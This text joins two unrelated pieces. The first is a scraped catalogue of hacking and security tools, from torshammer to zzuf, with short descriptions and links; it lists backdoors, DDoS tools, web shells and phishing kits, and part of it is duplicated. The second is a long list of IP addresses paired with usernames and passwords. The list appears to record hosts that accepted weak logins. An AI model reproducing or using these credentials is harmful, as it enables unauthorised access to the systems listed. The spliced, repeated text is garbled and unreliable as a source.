torshammer 1.0 A slow POST Denial of Service testing tool written in Python. http://sourceforge.net/projects/torshammer/ torsocks 2.0.0 Wrapper to safely torify applications http://code.google.com/p/torsocks tpcat latest TPCAT is based upon pcapdiff by the EFF. TPCAT will analyze two packet captures (taken on each side of the firewall as an example) and report any packets that were seen on the source capture but didn’t make it to the dest. http://sourceforge.net/projects/tpcat/ traceroute 2.0.21 Tracks the route taken by packets over an IP network http://traceroute.sourceforge.net/ trid 2.11 An utility designed to identify file types from their binary signatures http://mark0.net/soft-trid-e.html trinity 3728.985a087 A Linux System call fuzzer. http://codemonkey.org.uk/projects/trinity/ trixd00r 0.0.1 An advanced and invisible userland backdoor based on TCP/IP for UNIX systems http://nullsecurity.net/tools/backdoor.html truecrack 35 Password cracking for truecrypt(c) volumes. http://code.google.com/p/truecrack/ truecrypt 7.1a Free open-source cross-platform disk encryption software http://www.truecrypt.org/ tsh 0.6 An open-source UNIX backdoor that compiles on all variants, has full pty support, and uses strong crypto for communication. http://packetstormsecurity.com/search/?q=tsh tsh-sctp 2.850a2da An open-source UNIX backdoor. https://github.com/infodox/tsh-sctp tuxcut 5.0 Netcut-like program for Linux written in PyQt http://bitbucket.org/a_atalla/tuxcut/ twofi 2.0 Twitter Words of Interest. http://www.digininja.org/projects/twofi.php u3-pwn 2.0 A tool designed to automate injecting executables to Sandisk smart usb devices with default U3 software install http://www.nullsecurity.net/tools/backdoor.html *__uatester 1.06__ User Agent String Tester http://code.google.com/p/ua-tester/ *__ubertooth 2012.10.R1__ A 2.4 GHz wireless development board suitable for Bluetooth experimentation. Open source hardware and software. Tools only http://sourceforge.net/projects/ubertooth/ *__ubitack 0.3__ Tool, which automates some of the tasks you might need on a (wireless) penetration test or while you are on the go. https://code.google.com/p/ubitack/ *__udis86 1.7.2__ A minimalistic disassembler library http://udis86.sourceforge.net/ *__udptunnel 19__ Tunnels TCP over UDP packets. http://code.google.com/p/udptunnel/ *__uefi-firmware-parser 103.9d4d220__ Parse BIOS/Intel ME/UEFI firmware related structures: Volumes, FileSystems, Files, etc https://github.com/theopolis/uefi-firmware-parser *__ufo-wardriving 4__ Allows you to test the security of wireless networks by detecting their passwords based on the router model http://www.ufo-wardriving.com/ *__ufonet 9.5484a90__ A tool designed to launch DDoS attacks against a target, using 'Open Redirect' vectors on third party web applications, like botnet. https://github.com/epsylon/ufonet *__umap 25.3ad8121__ The USB host security assessment tool. https://github.com/nccgroup/umap *__umit 1.0__ A powerful nmap frontend. http://www.umitproject.org/ *__unhide 20130526__ A forensic tool to find processes hidden by rootkits, LKMs or by other techniques. http://sourceforge.net/projects/unhide/ *__unicorn 9.a18cb5d__ A simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. https://github.com/trustedsec/unicorn *__unicornscan 0.4.7__ A new information gathering and correlation engine. http://www.unicornscan.org/ *__uniofuzz 1337__ The universal fuzzing tool for browsers, web services, files, programs and network services/ports http://nullsecurity.net/tools/fuzzer.html *__uniscan 6.2__ A simple Remote File Include, Local File Include and Remote Command Execution vulnerability scanner. http://sourceforge.net/projects/uniscan/ *__unix-privesc-check 1.4__ Tries to find misconfigurations that could allow local unprivilged users to escalate privileges to other users or to access local apps (e.g. databases) http://pentestmonkey.net/tools/audit/unix-privesc-check *__unsecure 1.2__ Bruteforces network login masks. http://www.sniperx.net/ *__upnpscan 0.4__ Scans the LAN or a given address range for UPnP capable devices. http://www.cqure.net/wp/upnpscan/ *__upx 3.91__ Ultimate executable compressor. http://upx.sourceforge.net/ *__urlcrazy 0.5__ Generate and test domain typos and variations to detect and perform typo squatting, URL hijacking, phishing, and corporate espionage. http://www.morningstarsecurity.com/research/urlcrazy *__urldigger 02c__ A python tool to extract URL addresses from different HOT sources and/or detect SPAM and malicious code https://code.google.com/p/urldigger/ *__username-anarchy 0.2__ Tools for generating usernames when penetration testing http://www.morningstarsecurity.com/research/username-anarchy *__usernamer 7.813139d__ Pentest Tool to generate usernames/logins based on supplied names. https://github.com/jseidl/usernamer *__uw-loveimap 0.1__ Multi threaded imap bounce scanner. http://uberwall.org/bin/download/45/UWloveimap.tgz *__uw-offish 0.1__ Clear-text protocol simulator. http://uberwall.org/bin/download/42/UW_offish.1.tar.gz *__uw-udpscan 0.1__ Multi threaded udp scanner. http://uberwall.org/bin/download/44/UWudpscan.tar.gz *__uw-zone 0.1__ Multi threaded, randomized IP zoner. http://uberwall.org/bin/download/43/UWzone.tgz *__v3n0m 77.cdaf14e__ Popular linux version of Balthazar/NovaCygni's 'v3n0m' scanner. Searches 18k+ dorks over 13 search engines. https://github.com/v3n0m-Scanner/V3n0M-Scanner * __valgrind 3.10.1__ A tool to help find memory-management problems in programs http://valgrind.org/ * __vanguard 0.1__ A comprehensive web penetration testing tool written in Perl thatidentifies vulnerabilities in web applications. http://packetstormsecurity.com/files/110603/Vanguard-Pentesting-Scanner.html * __vbrute 1.11dda8b__ Virtual hosts brute forcer. https://github.com/nccgroup/vbrute * __vega 1.0__ An open source platform to test the security of web applications https://github.com/subgraph/Vega/wiki * __veil 276.f6dc4ff__ A tool designed to generate metasploit payloads that bypass common anti-virus solutions. https://github.com/veil-evasion/Veil * __vfeed 36.a0fdf06__ Open Source Cross Linked and Aggregated Local Vulnerability Database main repository. http://www.toolswatch.org/vfeed * __vidalia 0.2.21__ Controller GUI for Tor https://www.torproject.org/vidalia * __videosnarf 0.63__ A new security assessment tool for pcap analysis http://ucsniff.sourceforge.net/videosnarf.html * __vinetto 0.07beta__ A forensics tool to examine Thumbs.db files http://vinetto.sourceforge.net * __viper 501.5f6a19a__ A Binary analysis framework. https://github.com/botherder/viper * __viproy-voipkit 2.0__ VoIP Pen-Test Kit for Metasploit Framework http://viproy.com/ * __vivisect 20140803__ A Python based static analysis and reverse engineering framework, Vdb is a Python based research/reversing focused debugger and programatic debugging API by invisigoth of kenshoto http://visi.kenshoto.com/ * __vnak 1.cf0fda7__ Aim is to be the one tool a user needs to attack multiple VoIP protocols. https://www.isecpartners.com/vnak.html * __vnc-bypauth 0.0.1__ Multi-threaded bypass authentication scanner for VNC servers <= 4.1.1. http://pentester.fr/resources/tools/techno/VNC/VNC_bypauth/ * __vncrack 1.21__ What it looks like: crack VNC. http://phenoelit-us.org/vncrack * __voiper 0.07__ A VoIP security testing toolkit incorporating several VoIP fuzzers and auxilliary tools to assist the auditor. http://voiper.sourceforge.net/ * __voiphopper 2.04__ A security validation tool that tests to see if a PC can mimic the behavior of an IP Phone. It rapidly automates a VLAN Hop into the Voice VLAN. http://voiphopper.sourceforge.net/ * __voipong 2.0__ A utility which detects all Voice Over IP calls on a pipeline, and for those which are G711 encoded, dumps actual conversation to seperate wave files. http://www.enderunix.org/voipong/ * __volatility 2.4.1__ A memory forensics toolkit. https://www.volatilesystems.com/default/volatility * __vstt 0.5.0__ VSTT is a multi-protocol tunneling tool. It accepts input by TCP stream sockets and FIFOs, and can send data via TCP, POP3, and ICMP tunneling. http://www.wendzel.de/dr.org/files/Projects/vstt/ * __vulscan 2.0__ A module which enhances nmap to a vulnerability scanner http://www.computec.ch/projekte/vulscan/ * __w3af 1.6__ Web Application Attack and Audit Framework. http://w3af.sourceforge.net/ * __waffit 30__ A set of security tools to identify and fingerprint Web Application Firewall/WAF products protecting a website http://code.google.com/p/waffit/ * __wafp 0.01_26c3__ An easy to use Web Application Finger Printing tool written in ruby using sqlite3 databases for storing the fingerprints. http://packetstormsecurity.com/files/84468/Web-Application-Finger-Printer.01-26c3.html * __wapiti 2.3.0__ A vulnerability scanner for web applications. It currently search vulnerabilities like XSS, SQL and XPath injections, file inclusions, command execution, LDAP injections, CRLF injections... http://wapiti.sourceforge.net/ * __wavemon 0.7.6__ Ncurses-based monitoring application for wireless network devices http://eden-feed.erg.abdn.ac.uk/wavemon/ * __web-soul 2__ A plugin based scanner for attacking and data mining web sites written in Perl. http://packetstormsecurity.com/files/122064/Web-Soul-Scanner.html * __webacoo 0.2.3__ Web Backdoor Cookie Script-Kit. https://bechtsoudis.com/webacoo/ * __webenum 0.1__ Tool to enumerate http responses using dynamically generated queries and more. Useful for penetration tests against web servers. http://code.google.com/p/webenum/ * __webhandler 0.8.5__ A handler for PHP system functions & also an alternative 'netcat' handler. https://github.com/lnxg33k/webhandler * __webpwn3r 35.3fb27bb__ A python based Web Applications Security Scanner. https://github.com/zigoo0/webpwn3r * __webrute 3.3__ Web server directory brute forcer. https://github.com/BlackArch/webrute * __webscarab 20120422.001828__ Framework for analysing applications that communicate using the HTTP and HTTPS protocols http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project * __webshag 1.10__ A multi-threaded, multi-platform web server audit tool. http://www.scrt.ch/en/attack/downloads/webshag * __webshells 6.690ebd9__ Web Backdoors. https://github.com/BlackArch/webshells * __webslayer 5__ A tool designed for brute forcing Web Applications https://code.google.com/p/webslayer/ * __websockify__ 0.6.0 WebSocket to TCP proxy/bridge. http://github.com/kanaka/websockify * __webspa 0.7__ A web knocking tool, sending a single HTTP/S to run O/S commands. http://sourceforge.net/projects/webspa/ * __websploit 3.0.0__ An Open Source Project For, Social Engineering Works, Scan, Crawler & Analysis Web, Automatic Exploiter, Support Network Attacks http://code.google.com/p/websploit/ * __weevely 1.1__ Stealth tiny web shell http://epinna.github.io/Weevely/ * __wepbuster 1.0_beta_0.7__ script for automating aircrack-ng http://code.google.com/p/wepbuster/ * __wfuzz 24.1c6ecd8__ Utility to bruteforce web applications to find their not linked resources. https://github.com/xmendez/wfuzz * __whatweb 0.4.7__ Next generation web scanner that identifies what websites are running. http://www.morningstarsecurity.com/research/whatweb * __wi-feye 1.0__ An automated wireless penetration testing tool written in python, its designed to simplify common attacks that can be performed on wifi networks so that they can be executed quickly and easily. http://wi-feye.za1d.com/download.php * __wifi-honey 1.0__ A management tool for wifi honeypots http://www.digininja.org/projects/wifi_honey.php * __wifi-monitor 0.r22.71340a3__ Prints the IPs on your local network that're sending the most packets https://github.com/DanMcInerney/wifi-monitor * __wificurse 0.3.9__ WiFi jamming tool. https://github.com/oblique/wificurse * __wifijammer 43.4a0fe56__ A python script to continuosly jam all wifi clients within range. https://github.com/DanMcInerney/wifijammer * __wifiphisher 17.09cf393__ Fast automated phishing attacks against WPA networks. https://github.com/sophron/wifiphisher * __wifitap 2b16088__ WiFi injection tool through tun/tap device. https://github.com/GDSSecurity/wifitap * __wifite 2.28fc5cd__ A tool to attack multiple WEP and WPA encrypted networks at the same time. http://code.google.com/p/wifite/ * __wig 291.14f19bd__ WebApp Information Gatherer. https://github.com/jekyc/wig * __wikigen 8.348aa99__ A script to generate wordlists out of wikipedia pages. https://github.com/zombiesam/wikigen * __winexe 1.00__ Remotely execute commands on Windows NT/2000/XP/2003 systems. http://sourceforge.net/projects/winexe/ * __winfo 2.0__ Uses null sessions to remotely try to retrieve lists of and information about user accounts, workstation/interdomain/server trust accounts, shares (also hidden), sessions, logged in users, and password/lockout policy, from Windows NT/2000/XP. http://www.ntsecurity.nu/toolbox/winfo/ * __wireless-ids 24.b132071__ Ability to detect suspicious activity such as (WEP/WPA/WPS) attack by sniffing the air for wireless packets. https://github.com/SYWorks/wireless-ids * __wireshark-cli 1.12.2__ a free network protocol analyzer for Unix/Linux and Windows - CLI version http://www.wireshark.org/ * __wireshark-gtk 1.12.2__ a free network protocol analyzer for Unix/Linux and Windows - GTK frontend http://www.wireshark.org/ * __wirouter-keyrec 1.1.2__ A powerful and platform independent software to recover the default WPA passphrases of the supported router models (Telecom Italia Alice AGPF, Fastweb Pirelli, Fastweb Tesley, Eircom Netopia, Pirelli TeleTu/Tele 2). http://www.salvatorefresta.net/tools/ * __witchxtool 1.1__ A perl script that consists of a port scanner, LFI scanner, MD5 bruteforcer, dork SQL injection scanner, fresh proxy scanner, and a dork LFI scanner. http://packetstormsecurity.com/files/97465/Witchxtool-Port-LFI-SQL-Scanner-And-MD5-Bruteforcing-Tool.1.html * __wlan2eth 1.3__ re-writes 802.11 captures into standard Ethernet frames. http://www.willhackforsushi.com/?page_id=79 * __wmat 0.1__ Automatic tool for testing webmail accounts http://netsec.rs/70/tools.html * __wnmap 0.1__ A shell script written with the purpose to automate and chain scans via nmap. You can run nmap with a custom mode written by user and create directories for every mode with the xml/nmap files inside. http://nullsecurity.net/tools/automation.html * __wol-e 2.0__ A suite of tools for the Wake on LAN feature of network attached computers http://code.google.com/p/wol-e/ * __wordpot 37.e42eeda__ A Wordpress Honeypot. https://github.com/gbrindisi/wordpot * __wpbf 7.11b6ac1__ Multithreaded WordPress brute forcer. https://github.com/dejanlevaja/wpbf * __wpscan 1803.88808db__ A vulnerability scanner which checks the security of WordPress installations using a black box approach. http://wpscan.org * __ws-attacker 1.3__ A modular framework for web services penetration testing. http://ws-attacker.sourceforge.net/ * __wsfuzzer 1.9.5__ A Python tool written to automate pentesting of web services. https://www.owasp.org/index.php/Category:OWASP_WSFuzzer_ProjectSOAP * __wyd 0.2__ Gets keywords from personal files. IT security/forensic tool. http://www.remote-exploit.org/?page_id=418 * __x-scan 3.3__ A general network vulnerabilities scanner for scanning network vulnerabilities for specific IP address scope or stand-alone computer by multi-threading method, plug-ins are supportable. http://www.xfocus.org/ * __xcavator 5.bd9e2d8__ Man-In-The-Middle and phishing attack tool that steals the victim's credentials of some web services like Facebook. https://github.com/nccgroup/xcavator * __xf86-video-qxl-git r541.cbe70e9__ Xorg X11 qxl video driver. http://www.spice-space.org/ * __xorbruteforcer 0.1__ Script that implements a XOR bruteforcing of a given file, although a specific key can be used too. http://eternal-todo.com/category/bruteforce * __xorsearch 1.11.1__ Program to search for a given string in an XOR, ROL or ROT encoded binary file. http://blog.didierstevens.com/programs/xorsearch/ * __xortool 0.96__ A tool to analyze multi-byte xor cipher. https://github.com/hellman/xortool/ * __xplico 33.0f6d8bc__ Internet Traffic Decoder. Network Forensic Analysis Tool (NFAT). http://www.xplico.org/ * __xprobe2 0.3__ An active OS fingerprinting tool. http://sourceforge.net/apps/mediawiki/xprobe/index.php?title=Main_Page * __xspy 1.0c__ A utility for monitoring keypresses on remote X servers http://www.freshports.org/security/xspy/ * __xsser 1.6__ A penetration testing tool for detecting and exploiting XSS vulnerabilites. http://xsser.sourceforge.net/ * __xssless 35.9eee648__ An automated XSS payload generator written in python. https://github.com/mandatoryprogrammer/xssless * __xsss 0.40b__ A brute force cross site scripting scanner. http://www.sven.de/xsss/ * __xssscan 8340.db8ef4a__ Command line tool for detection of XSS attacks in URLs. Based on ModSecurity rules from OWASP CRS. https://github.com/gwroblew/detectXSSlib * __xsssniper 0.9__ An automatic XSS discovery tool https://github.com/gbrindisi/xsssniper * __xssya 13.15ebdfe__ A Cross Site Scripting Scanner & Vulnerability Confirmation. https://github.com/yehia-mamdouh/XSSYA * __yara 3.2.0__ A malware identification and classification tool. https://plusvic.github.io/yara/ * __ycrawler 0.1__ A web crawler that is useful for grabbing all user supplied input related to a given website and will save the output. It has proxy and log file support. http://packetstormsecurity.com/files/98546/yCrawler-Web-Crawling-Utility.html * __yersinia 0.7.1__ A network tool designed to take advantage of some weakness in different network protocols http://www.yersinia.net/ * __yinjector 0.1__ A MySQL injection penetration tool. It has multiple features, proxy support, and multiple exploitation methods. http://packetstormsecurity.com/files/98359/yInjector-MySQL-Injection-Tool.html * __zackattack 5.1f96c14__ A new tool set to do NTLM Authentication relaying unlike any other tool currently out there. https://github.com/urbanesec/ZackAttack/ * __zaproxy 2.3.1__ A local intercepting proxy with integrated penetration testing tool for finding vulnerabilities in web applications. http://code.google.com/p/zaproxy/ * __zarp 0.1.5__ A network attack tool centered around the exploitation of local networks. https://defense.ballastsecurity.net/wiki/index.php/Zarp * __zerowine 0.0.2__ Malware Analysis Tool - research project to dynamically analyze the behavior of malware http://zerowine.sf.net/ * __zmap 1.2.1__ Fast network scanner designed for Internet-wide network surveys. https://zmap.io/ * __zulu 0.1__ A light weight 802.11 wireless frame generation tool to enable fast and easy debugging and probing of 802.11 networks. http://sourceforge.net/projects/zulu-wireless/ * __zykeys 0.1__ Demonstrates how default wireless settings are derived on some models of ZyXEL routers. http://packetstormsecurity.com/files/119156/Zykeys-Wireless-Tool.html * __zzuf 0.13__ Transparent application input fuzzer. http://sam.zoy.org/zzuf/ /yCrawler-Web-Crawling-Utility.html * __yersinia 0.7.1__ A network tool designed to take advantage of some weakness in different network protocols http://www.yersinia.net/ * __yinjector 0.1__ A MySQL injection penetration tool. It has multiple features, proxy support, and multiple exploitation methods. http://packetstormsecurity.com/files/98359/yInjector-MySQL-Injection-Tool.html * __zackattack 5.1f96c14__ A new tool set to do NTLM Authentication relaying unlike any other tool currently out there. https://github.com/urbanesec/ZackAttack/ * __zaproxy 2.3.1__ A local intercepting proxy with integrated penetration testing tool for finding vulnerabilities in web applications. http://code.google.com/p/zaproxy/ * __zarp 0.1.5__ A network attack tool centered around the exploitation of local networks. https://defense.ballastsecurity.net/wiki/index.php/Zarp * __zerowine 0.0.2__ Malware Analysis Tool - research project to dynamically analyze the behavior of malware http://zerowine.sf.net/ * __zmap 1.2.1__ Fast network scanner designed for Internet-wide network surveys. https://zmap.io/ * __zulu 0.1__ A light weight 802.11 wireless frame generation tool to enable fast and easy debugging and probing of 802.11 networks. http://sourceforge.net/projects/zulu-wireless/ * __zykeys 0.1__ Demonstrates how default wireless settings are derived on some models of ZyXEL routers. http://packetstormsecurity.com/files/119156/Zykeys-Wireless-Tool.html * __zzuf 0.13__ Transparent application input fuzzer. http://sam.zoy.org/zzuf/ Source: https://github.com/m4ll0k/Awesome-Hacking-Tools
  25. 65.36.36.4,webmaster,webmaster 65.36.36.4,webuser,webuser 65.36.36.4,www,www 65.36.37.1,123,123 65.36.37.1,1234,1234 65.36.37.1,1236,1236 65.36.37.1,abc123,abc123 65.36.37.1,abuse,abuse 65.36.37.1,account,account 65.36.37.1,admin,admin 65.36.37.1,administrator,administrator 65.36.37.1,allison,allison 65.36.37.1,amanda,amanda 65.36.37.1,andrew,andrew 65.36.37.1,angela,angela 65.36.37.1,canon,canon 65.36.37.1,carol,carol 65.36.37.1,chris,chris 65.36.37.1,chuck,chuck 65.36.37.1,cindy,cindy 65.36.37.1,computer,computer 65.36.37.1,david,david 65.36.37.1,dragon,dragon 65.36.37.1,general,general 65.36.37.1,guest,guest 65.36.37.1,harley,harley 65.36.37.1,helen,helen 65.36.37.1,info,info 65.36.37.1,intern,intern 65.36.37.1,internet,internet 65.36.37.1,james,james 65.36.37.1,jennifer,jennifer 65.36.37.1,jerry,jerry 65.36.37.1,jim,jim 65.36.37.1,john,john 65.36.37.1,kelsey,kelsey 65.36.37.1,linda,linda 65.36.37.1,lindsay,lindsay 65.36.37.1,maggie,maggie 65.36.37.1,magic,magic 65.36.37.1,mark,mark 65.36.37.1,michael,michael 65.36.37.1,michelle,michelle 65.36.37.1,mickey,mickey 65.36.37.1,mike,mike 65.36.37.1,nicole,nicole 65.36.37.1,passwd,passwd 65.36.37.1,password,password 65.36.37.1,patrick,patrick 65.36.37.1,qwerty,qwerty 65.36.37.1,richard,richard 65.36.37.1,root,root 65.36.37.1,sales,sales 65.36.37.1,sarah,sarah 65.36.37.1,science,science 65.36.37.1,shanti,shanti 65.36.37.1,spencer,spencer 65.36.37.1,steve,steve 65.36.37.1,temp,temp 65.36.37.1,test,test 65.36.37.1,tom,tom 65.36.37.1,training,training 65.36.37.1,web,web 65.36.37.1,webadmin,webadmin 65.36.37.1,webmaster,webmaster 65.36.37.1,webuser,webuser 65.36.37.1,www,www 65.37.108.39,info,info 65.37.174.126,test,test 65.38.11.119,intern,intern 65.38.190.244,chuck,password 65.38.190.244,john,password 65.38.190.248,john,password 65.38.190.249,john,password 65.38.190.250,john,password 65.38.190.251,john,password 65.38.190.251,linda,password 65.38.198.202,david,david 65.38.198.202,info,info 65.38.201.243,sales,sales 65.38.201.246,sales,sales 65.38.222.162,mark,1234 65.39.179.82,carol,carol123 65.39.195.88,admin,password 65.39.95.59,sarah,sarah 65.40.105.43,general,password 65.40.105.43,info,info 65.40.105.43,sales,sales 65.40.111.148,john,password 65.40.111.148,test,password 65.40.144.254,info,password 65.40.220.74,test,test 65.40.81.28,steve,steve 65.41.232.68,amanda,amanda 65.42.233.130,info,info 65.43.83.172,jim,password 65.44.140.3,info,info 65.44.140.3,webmaster,webmaster 65.44.160.38,administrator,password 65.44.182.162,canon,canon 65.44.203.162,jerry,12345 65.44.73.238,temp,password 65.49.10.201,test,test 65.5.0.3,patrick,patrick 65.5.6.3,sales,password 65.5.6.3,webmaster,password 65.51.113.42,jennifer,12345 65.51.12.94,chris,chris 65.51.120.18,steve,steve 65.51.145.130,123,123 65.51.145.130,1234,1234 65.51.145.130,1236,1236 65.51.145.130,abc123,abc12312 65.51.145.130,abuse,abuse 65.51.145.130,account,account 65.51.145.130,admin,admin 65.51.145.130,administrator,administrator 65.51.145.130,allison,allison 65.51.145.130,amanda,amanda 65.51.145.130,andrew,andrew12 65.51.145.130,angela,angela 65.51.145.130,canon,canon 65.51.145.130,carol,carol12 65.51.145.130,chris,chris 65.51.145.130,chuck,chuck 65.51.145.130,cindy,cindy 65.51.145.130,computer,computer 65.51.145.130,david,david 65.51.145.130,dragon,dragon 65.51.145.130,general,general 65.51.145.130,guest,guest 65.51.145.130,harley,harley12 65.51.145.130,helen,helen 65.51.145.130,info,info 65.51.145.130,intern,intern 65.51.145.130,internet,internet 65.51.145.130,james,james 65.51.145.130,jennifer,jennifer12 65.51.145.130,jerry,jerry 65.51.145.130,jim,jim 65.51.145.130,john,john 65.51.145.130,kelsey,kelsey 65.51.145.130,linda,linda123 65.51.145.130,lindsay,lindsay 65.51.145.130,maggie,maggie 65.51.145.130,magic,magic 65.51.145.130,mark,mark 65.51.145.130,michael,michael 65.51.145.130,michelle,michelle 65.51.145.130,mickey,mickey 65.51.145.130,mike,mike 65.51.145.130,nicole,nicole 65.51.145.130,passwd,passwd 65.51.145.130,password,password 65.51.145.130,patrick,patrick 65.51.145.130,qwerty,qwerty 65.51.145.130,richard,richard 65.51.145.130,root,root12 65.51.145.130,sales,sales 65.51.145.130,sarah,sarah 65.51.145.130,science,science12 65.51.145.130,shanti,shanti 65.51.145.130,spencer,spencer 65.51.145.130,steve,steve 65.51.145.130,temp,temp 65.51.145.130,test,test 65.51.145.130,tom,tom 65.51.145.130,training,training 65.51.145.130,web,web12 65.51.145.130,webadmin,webadmin 65.51.145.130,webmaster,webmaster12 65.51.145.130,webuser,webuser 65.51.145.130,www,www 65.51.165.205,webmaster,webmaster 65.51.170.18,webmaster,webmaster 65.51.230.114,training,training 65.51.250.118,admin,admin 65.51.46.3,admin,admin 66.0.158.10,chuck,chuck 66.0.158.10,internet,internet 66.0.179.146,admin,password 66.0.247.170,general,general 66.0.250.155,test,test 66.0.66.114,test,test 66.11.95.204,sales,password 66.12.161.70,info,info123 66.14.116.217,jim,jim123 66.14.195.250,steve,steve 66.14.205.32,nicole,password 66.17.5.35,carol,password 66.18.146.216,sarah,sarah 66.18.148.28,sales,sales 66.18.160.4,test,test 66.18.160.6,test,test 66.18.170.107,test,1234 66.18.36.38,test,test 66.18.39.200,magic,magic 66.18.40.218,sales,sales 66.20.193.2,internet,internet 66.20.37.111,test,test 66.21.108.68,intern,intern 66.21.26.18,test,1234 66.24.253.226,mike,admin 66.24.253.226,webmaster,admin 66.27.58.154,test,1234 66.28.37.19,intern,intern 66.29.122.103,mickey,mickey123 66.29.122.105,cindy,cindy12 66.29.122.116,chuck,chuck12 66.29.122.116,kelsey,administrator 66.29.122.120,chuck,qwerty 66.29.122.124,maggie,maggie123 66.29.195.16,sales,password 66.29.89.208,test,test123 66.33.12.21,test,test 66.33.2.222,test,password 66.33.2.224,test,password 66.33.33.20,info,12345 66.33.35.210,test,test 66.33.35.213,test,test 66.33.7.15,test,password 66.34.129.2,chris,chris 66.34.129.3,chris,chris 66.34.129.4,chris,chris 66.34.129.5,chris,chris 66.34.129.6,chris,chris 66.34.129.7,chris,chris12 66.34.129.8,chris,chris 66.34.129.9,chris,chris12 66.34.143.108,harley,password 66.34.143.112,1234,1234123 66.34.193.120,sales,sales 66.34.193.146,sales,sales 66.34.193.170,sales,sales 66.34.193.175,sales,sales 66.34.193.176,sales,sales 66.34.193.182,sales,sales 66.34.193.185,sales,sales 66.34.193.21,sales,sales 66.34.193.22,sales,sales 66.34.193.225,sales,sales 66.34.193.227,sales,sales 66.34.193.230,sales,sales 66.34.193.233,sales,sales 66.34.193.236,sales,sales 66.34.193.239,sales,sales 66.34.193.241,sales,sales 66.34.193.250,sales,sales 66.34.193.43,sales,sales 66.34.193.51,sales,sales 66.34.193.74,sales,sales 66.34.193.76,sales,sales 66.34.193.90,sales,sales 66.34.193.92,sales,sales 66.34.193.95,sales,sales 66.34.212.107,sales,sales 66.34.212.116,sales,sales 66.34.212.129,sales,sales 66.34.212.136,sales,sales 66.34.212.137,sales,sales 66.34.212.14,sales,sales 66.34.212.157,sales,sales 66.34.212.168,sales,sales 66.34.212.179,sales,sales 66.34.212.184,sales,sales 66.34.212.20,sales,sales 66.34.212.207,sales,sales 66.34.212.208,sales,sales 66.34.212.213,sales,sales 66.34.212.220,sales,sales 66.34.212.221,sales,sales 66.34.212.222,sales,sales 66.34.212.223,sales,sales 66.34.212.230,sales,sales 66.34.212.233,sales,sales 66.34.212.234,sales,sales 66.34.212.235,sales,sales 66.34.212.24,sales,sales 66.34.212.246,sales,sales 66.34.212.27,sales,sales 66.34.212.30,sales,sales 66.34.212.34,sales,sales 66.34.212.57,sales,sales 66.34.212.63,sales,sales 66.34.212.67,sales,sales 66.34.212.7,sales,sales 66.34.212.71,sales,sales 66.34.212.86,sales,sales 66.35.110.251,info,password 66.35.110.251,mark,mark 66.35.110.251,test,test 66.36.182.222,webadmin,qwerty 66.38.192.187,patrick,12345 66.38.215.45,info,1234 66.38.215.45,sales,1234 66.39.108.101,info,password 66.39.131.215,carol,carol123 66.39.135.249,admin,password 66.39.135.35,lindsay,lindsay 66.39.135.35,michelle,michelle 66.39.155.194,info,password 66.39.186.218,nicole,nicole12 66.39.39.46,info,password 66.39.48.121,info,password 66.39.7.178,info,password 66.43.133.74,michelle,michelle 66.43.173.67,sales,sales123 66.44.150.66,admin,admin 66.46.181.212,richard,12345 66.46.37.224,admin,admin 66.46.37.224,steve,steve 66.46.37.229,info,info 66.46.88.138,internet,internet 66.46.88.138,test,test 66.49.23.13,john,john 66.59.124.12,training,12345 66.59.192.227,steve,steve 66.59.202.122,steve,steve 66.6.127.25,info,password 66.6.128.31,test,test 66.6.194.22,webmaster,webmaster 66.6.205.206,sales,sales 66.6.205.206,webmaster,webmaster 66.60.132.158,test,password 66.60.153.178,admin,admin 66.63.128.171,david,password 66.63.160.35,info,1234 66.63.164.163,webmaster,1234 66.64.129.154,mark,mark 66.64.158.203,abuse,abuse 66.64.204.50,temp,temp 66.64.251.34,james,password 66.64.251.34,michelle,password 66.64.41.130,info,info 66.65.117.163,admin,admin 66.7.103.70,sarah,sarah 66.7.231.27,jerry,jerry 66.70.176.126,intern,intern 66.70.177.77,chris,chris 66.70.209.105,john,password 66.70.21.140,info,info 66.70.21.141,info,info 66.70.210.74,guest,password 66.70.210.76,john,password 66.70.211.120,john,password 66.70.211.140,guest,password 66.70.211.97,guest,password 66.70.221.25,test,test 66.70.225.5,test,test12 66.70.255.53,chris,chris 66.70.71.140,training,training 66.71.203.140,jennifer,jennifer 66.71.203.140,jim,1234 66.71.203.230,test,test 66.76.121.4,root,root 66.76.129.61,admin,password 66.76.197.184,test,test 66.76.244.39,intern,password 66.76.244.39,mike,password 66.76.51.116,mike,password 66.76.67.170,info,info 66.76.77.165,angela,password 66.77.137.12,abc123,abc123 66.77.137.12,test,test 66.77.232.145,info,info 66.77.232.145,john,john 66.77.232.158,info,info 66.77.28.207,linda,linda123 66.77.28.207,michelle,michelle123 66.79.170.142,admin,admin 66.8.122.161,info,password 66.8.25.227,test,test 66.8.62.90,angela,angela123 66.9.67.230,info,info 66.9.67.230,sales,sales 66.94.87.250,info,1234 66.98.170.63,abuse,password 66.98.246.61,steve,password 67.100.168.202,info,info 67.100.168.202,sales,password 67.100.168.202,service,service 67.100.168.202,support,support 67.100.251.67,admin,[null] 67.100.251.67,guest,[null] 67.100.251.67,info,[null] 67.100.251.67,sales,[null] 67.100.251.67,service,[null] 67.100.251.67,support,support 67.100.251.67,test,[null] 67.100.251.67,webmaster,[null] 67.100.85.178,info,info 67.100.85.74,test,123456 67.100.99.5,sales,sales 67.101.141.118,admin,admin 67.102.3.235,info,password 67.103.179.179,test,test 67.104.238.178,sales,sales 67.104.238.178,test,test 67.105.154.29,sales,[null] 67.107.34.173,sales,sales123 67.107.56.18,admin,1234 67.108.224.100,sales,sales 67.108.224.113,sales,sales 67.108.224.115,sales,sales 67.109.146.94,support,[null] 67.109.215.226,admin,admin 67.109.215.226,service,1234 67.112.239.115,test,test 67.114.64.165,info,info 67.117.166.242,info,[null] 67.117.166.242,sales,[null] 67.122.134.74,test,test123 67.122.175.241,webmaster,password 67.123.207.69,info,1234 67.123.207.70,info,1234 67.123.207.71,info,1234 67.123.207.73,info,1234 67.123.207.74,info,1234 67.123.207.75,info,1234 67.123.207.76,info,1234 67.123.207.77,info,1234 67.123.207.78,info,1234 67.123.207.79,info,1234 67.123.207.80,info,1234 67.123.207.82,info,1234 67.123.207.84,info,1234 67.123.207.86,info,1234 67.123.207.87,info,1234 67.123.207.89,info,1234 67.123.207.90,info,1234 67.123.207.91,info,1234 67.123.207.97,info,1234 67.123.207.99,info,1234 67.126.103.33,admin,123456 67.127.202.141,admin,admin 67.129.131.242,test,test 67.129.196.122,test,123456 67.129.205.168,info,info 67.130.40.34,admin,admin 67.131.247.11,info,info 67.131.247.11,sales,sales 67.131.247.11,test,test 67.132.67.51,info,1234 